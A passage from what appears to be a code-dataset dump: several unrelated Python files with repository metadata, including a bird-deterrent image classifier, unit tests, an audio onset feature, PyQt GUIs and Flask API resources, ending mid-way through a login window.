parser.add_argument('--storage', required=True,
help='File path to store images and results')
parser.add_argument('--sound', required=True,
help='File path to deterrent sound')
# store_true so the flag can be passed without a value
parser.add_argument('--print', action='store_true', default=False,
help='Print inference results to terminal')
parser.add_argument('--training', action='store_true',
help='Training mode for image collection')
args = parser.parse_args()
return args
def main():
"""Creates camera pipeline, and pushes pipeline through ClassificationEngine
model. Logs results to user-defined storage. Runs either in training mode to
gather images for custom model creation or in deterrent mode that sounds an
'alarm' if a defined label is detected."""
args = user_selections()
print("Loading %s with %s labels." % (args.model, args.labels))
interpreter = make_interpreter(args.model)
interpreter.allocate_tensors()
labels = read_label_file(args.labels)
input_tensor_shape = interpreter.get_input_details()[0]['shape']
if (input_tensor_shape.size != 4 or
input_tensor_shape[0] != 1):
raise RuntimeError(
'Invalid input tensor shape! Expected: [1, height, width, channel]')
output_tensors = len(interpreter.get_output_details())
if output_tensors != 1:
raise ValueError(
('Classification model should have 1 output tensor only!'
'This model has {}.'.format(output_tensors)))
storage_dir = args.storage
# Initialize logging file
logging.basicConfig(filename='%s/results.log' % storage_dir,
format='%(asctime)s-%(message)s',
level=logging.DEBUG)
last_time = time.monotonic()
last_results = [('label', 0)]
def user_callback(image, svg_canvas):
nonlocal last_time
nonlocal last_results
start_time = time.monotonic()
common.set_resized_input(
interpreter, image.size, lambda size: image.resize(size, Image.NEAREST))
interpreter.invoke()
results = get_classes(interpreter, args.top_k, args.threshold)
end_time = time.monotonic()
play_sounds = [labels[i] for i, score in results]
results = [(labels[i], score) for i, score in results]
if args.print:
print_results(start_time, last_time, end_time, results)
if args.training:
if do_training(results, last_results, args.top_k):
save_data(image, results, storage_dir)
else:
# Custom model mode:
# The labels can be modified to detect/deter user-selected items
if len(results):
if results[0][0] != 'background':
save_data(image, results, storage_dir)
if FOX_SQUIRREL_LABEL in play_sounds:
playsound(args.sound)
logging.info('Deterrent sounded')
last_results = results
last_time = end_time
gstreamer.run_pipeline(user_callback, videosrc=args.videosrc)
if __name__ == '__main__':
FOX_SQUIRREL_LABEL = 'fox squirrel, eastern fox squirrel, Sciurus niger'
main()
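An illustrative invocation (model, label, storage and sound paths are placeholders, not taken from the repository):

# python3 bird_classify.py --model models/bird_edgetpu.tflite --labels models/bird_labels.txt \
#     --storage /tmp/birds --sound sounds/deterrent.wav --print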
| 38.711656
| 94
| 0.666878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,463
| 0.390333
|
4906781740f98be4911b2335a3c4e24bb2089146
| 2,959
|
py
|
Python
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 789
|
2016-09-05T04:14:25.000Z
|
2022-03-30T09:51:54.000Z
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 5,724
|
2016-08-29T18:58:40.000Z
|
2022-03-31T23:49:42.000Z
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 233
|
2016-08-31T20:42:38.000Z
|
2022-02-17T16:42:39.000Z
|
import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
class BlockingMemoryClient:
def __init__(self, gcs_project=None, fs=None, deploy_config=None, session=None, headers=None, _token=None):
self._client = MemoryClient(gcs_project, fs, deploy_config, session, headers, _token)
async_to_blocking(self._client.async_init())
def _get_file_if_exists(self, filename):
return async_to_blocking(self._client._get_file_if_exists(filename))
def read_file(self, filename):
return async_to_blocking(self._client.read_file(filename))
def write_file(self, filename, data):
return async_to_blocking(self._client.write_file(filename, data))
def close(self):
return async_to_blocking(self._client.close())
class Tests(unittest.TestCase):
def setUp(self):
bucket_name = get_user_config().get('batch', 'bucket')
token = uuid.uuid4()
self.test_path = f'gs://{bucket_name}/memory-tests/{token}'
self.fs = GoogleStorageAsyncFS(project=PROJECT)
self.client = BlockingMemoryClient(fs=self.fs)
self.temp_files = set()
def tearDown(self):
async_to_blocking(self.fs.rmtree(None, self.test_path))
self.client.close()
async def add_temp_file_from_string(self, name: str, str_value: bytes):
handle = f'{self.test_path}/{name}'
async with await self.fs.create(handle) as f:
await f.write(str_value)
return handle
def test_non_existent(self):
for _ in range(3):
self.assertIsNone(self.client._get_file_if_exists(f'{self.test_path}/nonexistent'))
def test_small_write_around(self):
async def read(url):
async with await self.fs.open(url) as f:
return await f.read()
cases = [('empty_file', b''), ('null', b'\0'), ('small', b'hello world')]
for file, data in cases:
handle = async_to_blocking(self.add_temp_file_from_string(file, data))
expected = async_to_blocking(read(handle))
self.assertEqual(expected, data)
i = 0
cached = self.client._get_file_if_exists(handle)
while cached is None and i < 10:
cached = self.client._get_file_if_exists(handle)
i += 1
self.assertEqual(cached, expected)
def test_small_write_through(self):
cases = [('empty_file2', b''), ('null2', b'\0'), ('small2', b'hello world')]
for file, data in cases:
filename = f'{self.test_path}/{file}'
self.client.write_file(filename, data)
cached = self.client._get_file_if_exists(filename)
self.assertEqual(cached, data)
| 36.085366
| 111
| 0.663738
| 2,656
| 0.897601
| 0
| 0
| 0
| 0
| 341
| 0.115242
| 237
| 0.080095
|
49078fb3338a8d88957f2187faa7b3d0420743af
| 990
|
py
|
Python
|
feladatok.py
|
python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
feladatok.py
|
python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
feladatok.py
|
python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
# feladatok.py
import math

# Task 1
# Write a function named szokoev_e
# The function should return True if the year given as its parameter is a leap year
def szokoev_e(ev: int) -> bool:
    return ev % 4 == 0 and (ev % 100 != 0 or ev % 400 == 0)


# Task 2
# The function's input parameters are the integers a, b, c
# Write code so that a ends up with the largest number, b with the second largest and c with the smallest.
def csokkeno(a: int, b: int, c: int) -> tuple:
    eredmeny = sorted([a, b, c], reverse=True)
    return tuple(eredmeny)


# Task 3
# Write a function named palindrom_e that decides whether a string is a palindrome
# In the broader sense, a palindrome is a text or phrase that reads the same backwards as forwards
def palindrom_e(mondat: str) -> bool:
    tisztitott = ''.join(ch.lower() for ch in mondat if ch.isalnum())
    return tisztitott == tisztitott[::-1]


# Task 4
# Write a function that determines how many square numbers fall within a given interval
# E.g. the interval [1-9] contains the squares of 1, 2 and 3, i.e. three square numbers
def negyzetszamok_szama(a: int, b: int) -> int:
    return sum(1 for n in range(max(a, 0), b + 1) if math.isqrt(n) ** 2 == n)
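Quick sanity checks for the solutions above (illustrative; not the project's own test suite):

assert szokoev_e(2000) and not szokoev_e(1900)
assert csokkeno(1, 3, 2) == (3, 2, 1)
assert palindrom_e('Géza, kék az ég')
assert negyzetszamok_szama(1, 9) == 3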
| 28.285714
| 153
| 0.756566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 803
| 0.763308
|
0b2242c98f153e44bcbb14ec8721042c75e0511e
| 76
|
py
|
Python
|
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | 1
|
2018-04-02T15:38:10.000Z
|
2018-04-02T15:38:10.000Z
|
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | null | null | null |
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | null | null | null |
#from editgui import EditGUI
#from only_layout import OnlyLayout as EditGUI
| 25.333333
| 46
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.973684
|
0b24417f2ee0b6b95e1c21f1f50ee2435fb6de2e
| 1,210
|
py
|
Python
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 133
|
2018-05-18T13:54:10.000Z
|
2022-02-15T02:14:20.000Z
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 68
|
2018-06-03T16:42:09.000Z
|
2021-01-29T10:58:30.000Z
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 37
|
2018-11-02T02:40:29.000Z
|
2021-11-30T07:44:50.000Z
|
import librosa
import numpy as np
from . import base
from . import spectral
class OnsetStrength(base.Computation):
"""
Compute a spectral flux onset strength envelope.
Based on http://librosa.github.io/librosa/generated/librosa.onset.onset_strength.html
Args:
n_mels (int): Number of mel bands to generate.
"""
def __init__(self, n_mels=128, parent=None, name=None):
super(OnsetStrength, self).__init__(left_context=1, right_context=0, parent=parent, name=name)
self.n_mels = n_mels
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
# Compute the mel-spectrogram
power_spec = np.abs(spectral.stft_from_frames(chunk.data.T)) ** 2
mel = np.abs(librosa.feature.melspectrogram(S=power_spec, n_mels=self.n_mels, sr=sampling_rate))
mel_power = librosa.power_to_db(mel)
# Compute onset strengths
oenv = librosa.onset.onset_strength(S=mel_power, center=False)
# Switch dimensions and add dimension to have frames
oenv = oenv.T.reshape(oenv.shape[0], -1)
# Remove context
oenv = oenv[chunk.left_context:oenv.shape[0] - chunk.right_context]
return oenv
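The underlying librosa calls in isolation, with a synthetic signal (a sketch; the audiomate chunk/context plumbing handled above is omitted):

import librosa
import numpy as np

sr = 22050
y = np.random.randn(sr)  # one second of noise as a stand-in signal
mel = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=128)
mel_db = librosa.power_to_db(mel)
oenv = librosa.onset.onset_strength(S=mel_db, sr=sr, center=False)
print(oenv.shape)  # one onset-strength value per frame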
| 31.025641
| 104
| 0.686777
| 1,130
| 0.933884
| 0
| 0
| 0
| 0
| 0
| 0
| 338
| 0.279339
|
0b24c9c12856cb1232066c7941cc8a2db9d6f09f
| 2,496
|
py
|
Python
|
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog
import sys
from .readNanoscopeForceRamps import *
import matplotlib.pyplot as plt
from ..qt5_ui_files.ForceRampGUI import *
from matplotlib.backends.backend_qt5agg import (NavigationToolbar2QT as NavigationToolbar)
import os
import math
from ..qt5_ui_files.mplwidget1plot import mplwidget1plot
class forceRampGUI(QMainWindow):
signal1 = QtCore.pyqtSignal(float)
signal2 = QtCore.pyqtSignal(float)
def __init__(self):
super().__init__()
self.ui = Ui_ForceRampGUI()
self.ui.setupUi(self)
self.ui.pushButtonSendVi.clicked.connect(self.sendVi)
self.ui.pushButtonSendVf.clicked.connect(self.sendVf)
self.ui.pushButtonGetValue.clicked.connect(self.getValue)
MplToolbar = NavigationToolbar(self.ui.widget.canvas, self)
self.addToolBar(MplToolbar)
filename = QFileDialog.getOpenFileNames(
self, "Open File", os.getcwd(), "All Files (*)")[0][0]
self.rampObject = NanoscopeRamp(filename)
self.rampObject.readHeader()
self.rampObject.readRamps()
self.plotRamp()
def getValue(self):
x1,x2 = self.ui.widget.canvas.axes.get_xlim()
condition = np.logical_and((self.rampObject.Ramp[0]['RawX']>x1),(self.rampObject.Ramp[0]['RawX']<x2))
if self.ui.radioButtonForward.isChecked():
yf = self.rampObject.Ramp[0]['RawY'][0][condition]
self.ui.lineEditValue.setText(str(format(yf.mean(),'.3f')))
elif self.ui.radioButtonBackward.isChecked():
yb = self.rampObject.Ramp[0]['RawY'][1][condition]
self.ui.lineEditValue.setText(str(format(yb.mean(),'.3f')))
else:
yf = self.rampObject.Ramp[0]['RawY'][0][condition]
yb = self.rampObject.Ramp[0]['RawY'][1][condition]
y2 = (yf+yb)/2
self.ui.lineEditValue.setText(str(format(y2.mean(),'.3f')))
@QtCore.pyqtSlot()  # the original bare call discarded the decorator; '@' applies it to sendVi
def sendVi(self):
value = float(self.ui.lineEditValue.text())
self.signal1.emit(value)
@QtCore.pyqtSlot()  # the original bare call discarded the decorator; '@' applies it to sendVf
def sendVf(self):
value = float(self.ui.lineEditValue.text())
self.signal2.emit(value)
def plotRamp(self):
self.ui.widget.canvas.axes.clear()
self.ui.widget.canvas.axes.plot(self.rampObject.Ramp[0]['RawX'], self.rampObject.Ramp[0]['RawY'][0][:])
self.ui.widget.canvas.axes.plot(self.rampObject.Ramp[0]['RawX'], self.rampObject.Ramp[1]['RawY'][1][:])
self.ui.widget.canvas.axes.set_ylabel('Photodiode Vertical Signal (V)')
self.ui.widget.canvas.axes.set_xlabel('Sample Displacement (nm)')
self.ui.widget.canvas.figure.tight_layout()
self.ui.widget.canvas.draw()
| 35.657143
| 105
| 0.733574
| 2,130
| 0.853365
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.063702
|
0b28b47566a0388433df755a312dddf760b4c430
| 1,250
|
py
|
Python
|
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | null | null | null |
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | 43
|
2022-02-07T00:18:35.000Z
|
2022-03-21T04:42:48.000Z
|
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | null | null | null |
"""Create your tests for the admin app here."""
import pytest
from django.contrib.auth import get_user_model
from django.urls import reverse
pytestmark = pytest.mark.django_db
User = get_user_model()
class TestUserAdmin:
"""Test the admin interface."""
def test_changelist(self, admin_client):
"""Test the changelist view."""
url = reverse("admin:users_user_changelist")
response = admin_client.get(url)
assert response.status_code == 200
def test_search(self, admin_client):
"""Test the search functionality."""
url = reverse("admin:users_user_changelist")
response = admin_client.get(url, data={"q": "test"})
assert response.status_code == 200
def test_add(self, admin_client):
"""Test the add user functionality."""
url = reverse("admin:users_user_add")
response = admin_client.get(url)
assert response.status_code == 200
def test_view_user(self, admin_client):
"""Test the view user functionality."""
user = User.objects.get(username="admin")
url = reverse("admin:users_user_change", kwargs={"object_id": user.pk})
response = admin_client.get(url)
assert response.status_code == 200
| 33.783784
| 79
| 0.668
| 1,046
| 0.8368
| 0
| 0
| 0
| 0
| 0
| 0
| 354
| 0.2832
|
0b296cbeff42f183e0f9446e0c1d52f582289ecd
| 1,129
|
py
|
Python
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 5
|
2018-07-16T16:23:21.000Z
|
2021-08-20T15:43:23.000Z
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 719
|
2018-07-09T17:19:57.000Z
|
2022-03-30T15:30:59.000Z
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 9
|
2019-07-10T17:45:31.000Z
|
2021-08-30T21:51:21.000Z
|
from flask_apispec import MethodResource, marshal_with, doc, use_kwargs
from webargs import fields
from ..models import Dataset
from ..core import cache
from .utils import first_or_404
from ..schemas.dataset import DatasetSchema
class DatasetResource(MethodResource):
@doc(tags=['dataset'], summary='Get dataset by id.')
@cache.cached(60 * 60 * 24 * 300, query_string=True)
@marshal_with(DatasetSchema)
def get(self, dataset_id):
return first_or_404(Dataset.query.filter_by(id=dataset_id))
class DatasetListResource(MethodResource):
@doc(tags=['dataset'], summary='Returns list of datasets.')
@use_kwargs({
'active_only': fields.Boolean(
missing=True, description="Return only active Datasets")
},
location='query')
@cache.cached(60 * 60 * 24 * 300, query_string=True)
@marshal_with(DatasetSchema(
many=True, exclude=['dataset_address', 'preproc_address', 'runs']))
def get(self, **kwargs):
query = {}
if kwargs.pop('active_only'):
query['active'] = True
return Dataset.query.filter_by(**query).all()
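A registration sketch (the URL rules and spec object are assumptions, not shown in this file; flask-apispec's MethodResource subclasses Flask's MethodView, so the resources register as ordinary class-based views):

from flask import Flask
from flask_apispec.extension import FlaskApiSpec

app = Flask(__name__)
app.add_url_rule('/api/datasets/<int:dataset_id>',
                 view_func=DatasetResource.as_view('dataset'))
app.add_url_rule('/api/datasets',
                 view_func=DatasetListResource.as_view('dataset_list'))

docs = FlaskApiSpec(app)
docs.register(DatasetResource, endpoint='dataset')
docs.register(DatasetListResource, endpoint='dataset_list')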
| 35.28125
| 75
| 0.680248
| 894
| 0.791851
| 0
| 0
| 804
| 0.712135
| 0
| 0
| 175
| 0.155004
|
0b2a468542d7634a98be235c3eb2a43a90a6aa6a
| 2,194
|
py
|
Python
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 88
|
2020-06-11T03:14:30.000Z
|
2022-03-21T07:36:36.000Z
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 4
|
2021-04-29T19:22:08.000Z
|
2021-09-22T19:22:48.000Z
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 13
|
2020-06-14T14:19:01.000Z
|
2022-02-17T22:50:41.000Z
|
import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
def test_measures():
measure_ground_truth = { # graph order: o4, p4, c4, k4_1, c4_0, c4_1, c4_2, c4_3
'node_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'edge_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'diameter': [None, 3, 2, 2, 1, None, 5, 5, 5],
'average_distance': [None, 1.67, 1.33, 1.17, 1, None, 2.29, 2.29, 2.29],
'average_inverse_distance': [0, 0.72, 0.83, 0.92, 1.0, 0.36, 0.58, 0.58, 0.58],
'average_vertex_betweenness': [0, 4, 3.5, 3.25, 3, 3.5, 11.5, None, None],
'average_edge_betweenness': [0, 3.33, 2.0, 1.4, 1, 2, 7.11, 7.11, 7.11],
'average_clustering_coefficient': [0, 0, 0, 0.83, 1, 0, 0, None, None],
'largest_connected_component': [1, 4, 4, 4, 4, 4, 8, 8, 8],
'spectral_radius': [0, 1.62, 2, 2.56, 3, 2, 2.34, 2.9, 3.65],
'spectral_gap': [0, 1, 2, 2.56, 4, 0, 0.53, 1.19, 2],
'natural_connectivity': [0, 0.65, 0.87, 1.29, 1.67, 0.87, 0.97, 1.28, 1.81],
'spectral_scaling': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'generalized_robustness_index': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'algebraic_connectivity': [0, 0.59, 2, 2, 4, 0, 0.29, 0.4, 0.45],
'number_spanning_trees': [0, 1, 4, 8, 16, 0, 16, 32, 48],
'effective_resistance': [np.inf, 10, 5, 4, 3, np.inf, 46, 38, 35.33]
}
graphs = [o4_graph(), p4_graph(), c4_graph(), k4_1_graph(), k4_2_graph(),
two_c4_0_bridge(), two_c4_1_bridge(), two_c4_2_bridge(), two_c4_3_bridge()]
for measure_name, graph_values in measure_ground_truth.items():
for idx, graph in enumerate(graphs):
value = run_measure(graph, measure_name)
if value is not None: value = round(value, 2)
# print(idx, measure_name, value)
# A non-empty tuple is always truthy, so `assert (value, graph_values[idx])` could never
# fail; compare the computed value with the ground truth explicitly.
assert value == graph_values[idx]
def main():
test_measures()
if __name__ == '__main__':
main()
| 42.192308
| 97
| 0.591613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 475
| 0.2165
|
0b303fe60108c7d81edf13f0852f1b122917c330
| 13,679
|
py
|
Python
|
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
import verifyController
import pyodbc
from PyQt5.QtWidgets import QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import (QCoreApplication, QMetaObject,QSize,Qt)
from PySide2.QtGui import (QCursor, QFont,QIcon)
from PySide2.QtWidgets import *
from PySide2 import QtCore, QtGui, QtWidgets
import cameras
import pickle
import smtplib
from random import randint
import PyQt5
class Ui_LoginWindow(object):
def setupUi(self, LoginWindow):
LoginWindow.setObjectName("MainWindow")
LoginWindow.resize(1000, 1000)
LoginWindow.showMaximized()
sizePolicy = QtWidgets.QSizePolicy(QSizePolicy.Preferred,QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(10)
sizePolicy.setVerticalStretch(10)
sizePolicy.setHeightForWidth(LoginWindow.sizePolicy().hasHeightForWidth())
LoginWindow.setSizePolicy(sizePolicy)
LoginWindow.setCursor(QCursor(Qt.ArrowCursor))
icon =QIcon()
#icon.addPixmap(QPixmap("e9b4c65fb45f70ad1b573f67e486d91c.jpg"), QIcon.Normal , QIcon.Off)
LoginWindow.setWindowIcon(icon)
LoginWindow.setStyleSheet("QMainWindow{background-image: url(images/new.png);}")
LoginWindow.setToolButtonStyle(Qt.ToolButtonIconOnly)
self.centralwidget = QWidget(LoginWindow)
self.roomnumber = QComboBox()
self.roomnumber.setObjectName("roomnumber")
self.cameradep = QComboBox()
self.cameradep.setObjectName("cameradep")
self.centralwidget.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint)
self.verticalLayout.setContentsMargins(200, 10, 200, 30)
self.verticalLayout.setSpacing(30)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QLabel(self.centralwidget)
font = QFont()
font.setFamily("Arial Black")
font.setPointSize(35)
font.setBold(False)
font.setItalic(False)
font.setWeight(10)
self.label.setFont(font)
self.label.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 87 35pt \"Arial Black\";")
self.label.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.verticalWidget = QWidget(self.centralwidget)
self.verticalWidget.setStyleSheet("background-color: rgb(0, 0, 0);\n"
"font: 87 11pt \"Arial Black\";\n"
"color: rgb(255, 255, 255);")
self.verticalWidget.setObjectName("verticalWidget")
self.verticalLayout_2 = QVBoxLayout(self.verticalWidget)
self.verticalLayout_2.setSizeConstraint(QLayout.SetDefaultConstraint)
self.verticalLayout_2.setContentsMargins(100, 30, 100, 10)
self.verticalLayout_2.setSpacing(15)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_3 = QLabel(self.verticalWidget)
self.label_3.setObjectName("label_3")
self.verticalLayout_2.addWidget(self.label_3)
self.lineEdit_2 = QLineEdit(self.verticalWidget)
self.lineEdit_2.setObjectName("lineEdit_2")
self.verticalLayout_2.addWidget(self.lineEdit_2)
self.label_2 = QLabel(self.verticalWidget)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.lineEdit = QLineEdit(self.verticalWidget)
self.lineEdit.setObjectName("lineEdit")
self.lineEdit.setEchoMode(QLineEdit.Password)
self.verticalLayout_2.addWidget(self.lineEdit)
self.incorrect = QLabel(self.verticalWidget)
self.incorrect.setText("")
self.incorrect.setObjectName("incorrect")
self.incorrect.setStyleSheet("color: rgb(225, 37, 52);\n"
"font: 87 10pt \"Arial Black\";")
self.verticalLayout_2.addWidget(self.incorrect)
self.verticalWidget_2 = QWidget(self.verticalWidget)
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.verticalWidget_2.sizePolicy().hasHeightForWidth())
self.verticalWidget_2.setSizePolicy(sizePolicy)
self.verticalWidget_2.setMinimumSize(QSize(200, 121))
self.verticalWidget_2.setBaseSize(QSize(10, 0))
self.verticalWidget_2.setCursor(QCursor(Qt.ArrowCursor))
self.verticalWidget_2.setObjectName("verticalWidget_2")
self.verticalLayout_3 = QVBoxLayout(self.verticalWidget_2)
self.verticalLayout_3.setContentsMargins(30, 0, 30, 30)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.pushButton = QPushButton(self.verticalWidget_2)
self.pushButton.setStyleSheet("background-color: rgb(225, 37, 52);\n"
"border-color: rgb(255, 255, 255);")
self.pushButton.setObjectName("pushButton")
self.verticalLayout_3.addWidget(self.pushButton)
self.pushButton_2 = QPushButton(self.verticalWidget_2)
self.pushButton_2.setStyleSheet("font: italic 11pt \"Arial\";\n"
"text-decoration: underline;\n"
"color: rgb(0, 85, 255);")
self.pushButton_2.setObjectName("pushButton_2")
self.verticalLayout_3.addWidget(self.pushButton_2)
self.verticalLayout_2.addWidget(self.verticalWidget_2)
self.verticalLayout_2.setStretch(0, 1)
self.verticalLayout_2.setStretch(1, 1)
self.verticalLayout_2.setStretch(2, 1)
self.verticalLayout_2.setStretch(3, 1)
self.verticalLayout_2.setStretch(5, 1)
self.verticalLayout.addWidget(self.verticalWidget, 0,Qt.AlignHCenter|Qt.AlignVCenter)
self.verticalLayout.setStretch(0, 1)
self.verticalLayout.setStretch(1, 15)
LoginWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(LoginWindow)
QMetaObject.connectSlotsByName(LoginWindow)
def retranslateUi(self, LoginWindow):
_translate =QCoreApplication.translate
LoginWindow.setWindowTitle(_translate("MainWindow", "login","None"))
self.label.setText(_translate("MainWindow", "LOGIN","None"))
self.label_3.setText(_translate("MainWindow", "<html><head/><body><p align=\"center\">Enter Username</p></body></html>","None"))
self.label_2.setText(_translate("MainWindow", "<html><head/><body><p align=\"center\"><br/>Enter Password</p></body></html>","None"))
self.pushButton.setText(_translate("MainWindow", "Submit","None"))
self.pushButton_2.setText(_translate("MainWindow", "forgot password?","None"))
self.pushButton.clicked.connect(lambda:self.open_window(LoginWindow))
self.pushButton_2.clicked.connect(lambda:self.send_email(LoginWindow))
def open_window(self,LoginWindow):
if len(self.lineEdit_2.text()) == 0:
self.incorrect.setText("empty email field")
elif len(self.lineEdit.text()) == 0:
self.incorrect.setText("empty password field")
else:
server = r'Nurkanaan\sqlexpress'  # raw string: '\s' is not a valid escape sequence
database='senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER='+server+'; \
DATABASE='+database+'; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select * from headsInfo where email=? and pass=?"
cursor.execute(insert_query,self.lineEdit_2.text(), self.lineEdit.text())
result = cursor.fetchall()
conn.commit()
if len(result) == 0:
self.incorrect.setText("invalid email/password!")
server = r'Nurkanaan\sqlexpress'  # raw string: '\s' is not a valid escape sequence
database = 'senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER=' + server + '; \
DATABASE=' + database + '; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select * from administratorr where email=? and pass=?"
cursor.execute(insert_query, self.lineEdit_2.text(), self.lineEdit.text())
result = cursor.fetchall()
conn.commit()
if len(result)==0:
self.incorrect.setText("invalid email/password!")
else:
pickle.dump("no", open("sc.dat", "wb"))
pickle.dump(self.lineEdit_2.text(),open("email.dat" , "wb"))
self.window = PyQt5.QtWidgets.QMainWindow()
self.ui = cameras.Ui_CameraMainWindow()
self.ui.setupUi(self.window)
self.window.show()
LoginWindow.close()
else:
pickle.dump("no", open("sc.dat", "wb"))
pickle.dump(self.lineEdit_2.text(), open("email.dat", "wb"))
self.window = PyQt5.QtWidgets.QMainWindow()
self.ui = cameras.Ui_CameraMainWindow()
self.ui.setupUi(self.window)
self.window.show()
LoginWindow.close()
def send_email(self,LoginWindow):
if len(self.lineEdit_2.text()) == 0:
self.incorrect.setText("empty email field")
else:
server = r'Nurkanaan\sqlexpress'  # raw string: '\s' is not a valid escape sequence
